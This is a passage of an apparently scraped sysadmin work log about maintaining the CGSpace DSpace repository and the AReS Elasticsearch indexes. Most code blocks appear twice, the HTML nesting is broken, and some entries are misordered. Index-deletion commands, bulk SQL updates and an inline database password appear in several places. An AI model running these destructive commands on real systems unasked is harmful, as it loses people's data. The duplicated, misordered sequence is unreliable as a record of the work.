<li>I filed a bug on OpenRXV: <a href="https://github.com/ilri/OpenRXV/issues/64">https://github.com/ilri/OpenRXV/issues/64</a></li>
<li>For now I will try to delete the index and start a re-harvest in the Admin UI:</li>
</ul>
<pre tabindex="0"><code>$ curl -XDELETE http://localhost:9200/openrxv-items-final
{&quot;acknowledged&quot;:true}%
</code></pre>
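<ul>
<li>Listing the remaining indexes to confirm the deletion (a sketch, assuming the default port):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:9200/_cat/indices?v'
</code></pre>
<ul>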
<li>Moayad said he&rsquo;s working on the harvesting so I stopped it for now to re-deploy his latest changes</li>
<li>I updated Tomcat to version 7.0.107 on CGSpace (linode18), ran all updates, and restarted the server</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-[0-9]{2}-*&#39;;
</code></pre></div><h2 id="2020-12-14">2020-12-14</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; SELECT * FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-[0-9]{2}-*&#39;;
</span></span></code></pre></div><h2 id="2020-12-14">2020-12-14</h2>
<ul>
<li>The re-harvesting finished last night on AReS but there are no records in the <code>openrxv-items-final</code> index
<ul>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&#39;</span> | json_pp
{
&#34;count&#34; : 99992,
&#34;_shards&#34; : {
&#34;skipped&#34; : 0,
&#34;total&#34; : 1,
&#34;failed&#34; : 0,
&#34;successful&#34; : 1
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&#39;</span> | json_pp
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99992,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I&rsquo;m going to try to <a href="https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-clone-index.html">clone</a> the temp index to the final one&hellip;
<ul>
<li>First, set the <code>openrxv-items-temp</code> index to block writes (read only) and then clone it to <code>openrxv-items-final</code>:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
{&#34;acknowledged&#34;:true,&#34;shards_acknowledged&#34;:true,&#34;index&#34;:&#34;openrxv-items-final&#34;}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true,&#34;shards_acknowledged&#34;:true,&#34;index&#34;:&#34;openrxv-items-final&#34;}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>
<li>Now I see that the <code>openrxv-items-final</code> index has items, but there are still none in the AReS Explorer UI!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 99992,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99992,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>The api logs show this from last night after the harvesting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">[Nest] 92 - 12/13/2020, 1:58:52 PM [HarvesterService] Starting Harvest
[Nest] 92 - 12/13/2020, 10:50:20 PM [FetchConsumer] OnGlobalQueueDrained
[Nest] 92 - 12/13/2020, 11:00:20 PM [PluginsConsumer] OnGlobalQueueDrained
[Nest] 92 - 12/13/2020, 11:00:20 PM [HarvesterService] reindex function is called
(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
at IncomingMessage.&lt;anonymous&gt; (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
at IncomingMessage.emit (events.js:326:22)
at endReadableNT (_stream_readable.js:1223:12)
at processTicksAndRejections (internal/process/task_queues.js:84:21)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 1:58:52 PM [HarvesterService] Starting Harvest
</span></span><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 10:50:20 PM [FetchConsumer] OnGlobalQueueDrained
</span></span><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 11:00:20 PM [PluginsConsumer] OnGlobalQueueDrained
</span></span><span style="display:flex;"><span>[Nest] 92 - 12/13/2020, 11:00:20 PM [HarvesterService] reindex function is called
</span></span><span style="display:flex;"><span>(node:92) UnhandledPromiseRejectionWarning: ResponseError: index_not_found_exception
</span></span><span style="display:flex;"><span> at IncomingMessage.&lt;anonymous&gt; (/backend/node_modules/@elastic/elasticsearch/lib/Transport.js:232:25)
</span></span><span style="display:flex;"><span> at IncomingMessage.emit (events.js:326:22)
</span></span><span style="display:flex;"><span> at endReadableNT (_stream_readable.js:1223:12)
</span></span><span style="display:flex;"><span> at processTicksAndRejections (internal/process/task_queues.js:84:21)
</span></span></code></pre></div><ul>
<li>But I&rsquo;m not sure why the frontend doesn&rsquo;t show any data despite there being documents in the index&hellip;</li>
<li>I talked to Moayad and he reminded me that OpenRXV uses an alias to point to the temp and final indexes, but the UI actually uses the <code>openrxv-items</code> index (see the alias check below)</li>
<li>I cloned the <code>openrxv-items-final</code> index to <code>openrxv-items</code> index and now I see items in the explorer UI</li>
<li>The PDF report was broken and I looked in the API logs and saw this:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">(node:94) UnhandledPromiseRejectionWarning: Error: Error: Could not find soffice binary
at ExportService.downloadFile (/backend/dist/export/services/export/export.service.js:51:19)
at processTicksAndRejections (internal/process/task_queues.js:97:5)
</code></pre></div>
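<ul>
<li>For reference, checking where the Elasticsearch aliases point is just (a sketch, assuming the default port):</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:9200/_cat/aliases?v'
</code></pre>
<ul>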
<li>I installed <code>unoconv</code> in the backend api container and now it works&hellip; but I wonder why this changed&hellip;</li>
<li>Skype with Abenet and Peter to discuss AReS that will be shown to ILRI scientists this week
<ul>
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=0' | json_pp &gt; /tmp/policy1.json
$ http --print b 'https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=100' | json_pp &gt; /tmp/policy2.json
$ query-json '.items | length' /tmp/policy1.json
<pre tabindex="0"><code>$ http --print b &#39;https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=0&#39; | json_pp &gt; /tmp/policy1.json
$ http --print b &#39;https://cgspace.cgiar.org/rest/collections/defee001-8cc8-4a6c-8ac8-21bb5adab2db?expand=all&amp;limit=100&amp;offset=100&#39; | json_pp &gt; /tmp/policy2.json
$ query-json &#39;.items | length&#39; /tmp/policy1.json
100
$ query-json '.items | length' /tmp/policy2.json
32
</code></pre><ul>
<li>I realized that the issue of missing/duplicate items in AReS might be because of this <a href="https://jira.lyrasis.org/browse/DS-3849">REST API bug that causes /items to return items in non-deterministic order</a></li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2020-12-15">2020-12-15</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-2020-12-14
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2020-12-15">2020-12-15</h2>
<ul>
<li>After the re-harvest last night there were 200,000 items in the <code>openrxv-items-temp</code> index again
<ul>
</li>
<li>I checked the 1,534 fixes in Open Refine (had to fix a few UTF-8 errors, as always from Peter&rsquo;s CSVs) and then applied them using the <code>fix-metadata-values.py</code> script:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -m <span style="color:#ae81ff">3</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./fix-metadata-values.py -i /tmp/2020-10-28-fix-1534-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>$ ./delete-metadata-values.py -i /tmp/2020-10-28-delete-2-Authors.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.contributor.author -m <span style="color:#ae81ff">3</span>
</span></span></code></pre></div><ul>
<li>Since I was re-indexing Discovery anyways I decided to check for any uppercase AGROVOC and lowercase them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
BEGIN
dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
UPDATE 406
dspace=# COMMIT;
COMMIT
</code></pre></div>
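<ul>
<li>Counting the rows that would match before running such an UPDATE is a cheap safety check (a sketch):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=57 AND text_value ~ '[[:upper:]]';
</code></pre>
<ul>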
<li>I also updated the Font Awesome icon classes for version 5 syntax:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# BEGIN;
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-rss&#39;,&#39;fas fa-rss&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-rss%&#39;;
UPDATE 74
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-at&#39;,&#39;fas fa-at&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-at%&#39;;
UPDATE 74
dspace=# COMMIT;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-rss&#39;,&#39;fas fa-rss&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-rss%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 74
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;fa fa-at&#39;,&#39;fas fa-at&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;%fa fa-at%&#39;;
</span></span><span style="display:flex;"><span>UPDATE 74
</span></span><span style="display:flex;"><span>dspace=# COMMIT;
</span></span></code></pre></div><ul>
<li>Then I started a full Discovery re-index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;</span>
$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 265m11.224s
user 171m29.141s
sys 2m41.097s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34;</span>
</span></span><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 265m11.224s
</span></span><span style="display:flex;"><span>user 171m29.141s
</span></span><span style="display:flex;"><span>sys 2m41.097s
</span></span></code></pre></div><ul>
<li>Udana sent a report that the WLE approver is experiencing the same issue Peter highlighted a few weeks ago: they are unable to save metadata edits in the workflow</li>
<li>Yesterday Atmire responded about the owningComm and owningColl duplicates in Solr saying they didn&rsquo;t see any anymore&hellip;
<ul>
<ul>
<li>After the Discovery re-indexing finished on CGSpace I prepared to start re-harvesting AReS by making sure the <code>openrxv-items-temp</code> index was empty and that the backup index I made yesterday was still there:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
{
&#34;acknowledged&#34; : true
}
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 0,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 99992,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><h2 id="2020-12-16">2020-12-16</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;acknowledged&#34; : true
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2020-12-14/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 99992,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="2020-12-16">2020-12-16</h2>
<ul>
<li>The harvesting on AReS finished last night so this morning I manually cloned the <code>openrxv-items-temp</code> index to <code>openrxv-items</code>
<ul>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100046,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
$ curl -s -X POST <span style="color:#e6db74">&#34;http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty&#34;</span>
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100046,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100046,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items?pretty&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#34;http://localhost:9200/openrxv-items-temp/_clone/openrxv-items?pretty&#34;</span>
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100046,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings?pretty&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp?pretty&#39;</span>
</span></span></code></pre></div><ul>
<li>Interestingly <a href="https://hdl.handle.net/10568/110447">the item</a> that we noticed was duplicated now only appears once</li>
<li>The <a href="https://hdl.handle.net/10568/110133">missing item</a> is still missing</li>
<li>Jane Poole noticed that the &ldquo;previous page&rdquo; and &ldquo;next page&rdquo; buttons are not working on AReS
</li>
<li>Generate a list of submitters and approvers active in the last months using the Provenance field on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -h localhost -U postgres dspace -c <span style="color:#e6db74">&#34;SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-(06|07|08|09|10|11|12)-*&#39;&#34;</span> &gt; /tmp/provenance.txt
$ grep -o -E <span style="color:#e6db74">&#39;by .*)&#39;</span> /tmp/provenance.txt | grep -v -E <span style="color:#e6db74">&#34;( on |checksum)&#34;</span> | sed -e <span style="color:#e6db74">&#39;s/by //&#39;</span> -e <span style="color:#e6db74">&#39;s/ (/,/&#39;</span> -e <span style="color:#e6db74">&#39;s/)//&#39;</span> | sort | uniq &gt; /tmp/recent-submitters-approvers.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -U postgres dspace -c <span style="color:#e6db74">&#34;SELECT text_value FROM metadatavalue WHERE metadata_field_id=28 AND text_value ~ &#39;^.*on 2020-(06|07|08|09|10|11|12)-*&#39;&#34;</span> &gt; /tmp/provenance.txt
</span></span><span style="display:flex;"><span>$ grep -o -E <span style="color:#e6db74">&#39;by .*)&#39;</span> /tmp/provenance.txt | grep -v -E <span style="color:#e6db74">&#34;( on |checksum)&#34;</span> | sed -e <span style="color:#e6db74">&#39;s/by //&#39;</span> -e <span style="color:#e6db74">&#39;s/ (/,/&#39;</span> -e <span style="color:#e6db74">&#39;s/)//&#39;</span> | sort | uniq &gt; /tmp/recent-submitters-approvers.csv
</span></span></code></pre></div><ul>
<li>Peter wanted to use it to send some mail to the users&hellip;</li>
</ul>
<h2 id="2020-12-17">2020-12-17</h2>
<ul>
<li>I see some errors from CUA in our Tomcat logs:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">Thu Dec 17 07:35:27 CET 2020 | Query:containerItem:b049326a-0e76-45a8-ac0c-d8ec043a50c6
Error while updating
java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1155)
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:241)
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1140)
at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1129)
...
</code></pre></div>
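<ul>
<li>Counting how often the error appears gives a sense of the scale (a sketch, with a hypothetical log path):</li>
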